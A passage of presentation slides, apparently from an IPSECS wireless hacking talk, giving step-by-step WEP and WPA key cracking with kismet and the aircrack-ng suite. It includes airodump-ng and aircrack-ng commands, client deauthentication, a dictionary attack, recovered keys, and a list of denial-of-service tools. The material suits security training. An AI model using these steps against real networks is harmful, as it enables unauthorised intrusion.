  • 71. IPSECS WEP Cracking • Start interface on Monitor mode. • Run kismet to find AP target. • Find AP with connected clients on it. Or do fake authentication to associate with AP if no client connected. • Inject packet using aireplay-ng • Dump packet using airodump-ng • Crack dumped file using aircrack-ng www.ipsecs.com
  • 72. IPSECS Dumping Packet airodump-ng -c 11 --bssid 00:1c:10:b3:59:38 -w /tmp/output wlan0 www.ipsecs.com
  • 73. IPSECS Cracking Key aircrack-ng -z -b 00:1c:10:b3:59:38 /tmp/output-01.cap Key is “abcdef1234” www.ipsecs.com
  • 74. IPSECS WPA Cracking • WPA is based on RC4 algorithm + TKIP/AES • WPA-PSK can be attack using dictionary attack. • Of course, it needs dictionary • Can be cracked when offline • Tools : aircrack-ng www.ipsecs.com
  • 75. IPSECS WPA Cracking • Start interface on Monitor mode. • Run kismet to find AP target. • Find AP with which,s protected by WPA. • Dump packet using airodump-ng • Wait for a client to authenticate to AP, or deauthenticate client which's connected to AP. • Crack dumped file using aircrack-ng www.ipsecs.com
  • 76. IPSECS WPA Cracking airodump-ng -c 11 --bssid 00:21:29:79:50:F1 -w /tmp/out-psk wlan0 www.ipsecs.com
  • 77. IPSECS WPA Cracking aircrack-ng -w /usr/share/dict/words -b 00:21:29:79:50:F1 /tmp/out-psk*.cap Key is “miko2009” www.ipsecs.com
  • 78. IPSECS Denial of Service • Making wireless network unavailable. • Tools : airjack, void11, aircrack www.ipsecs.com
  • 79. IPSECS DEMO - Q&A WIRELESS HACKING www.ipsecs.com
  • 80. IPSECS THANK YOU! www.ipsecs.com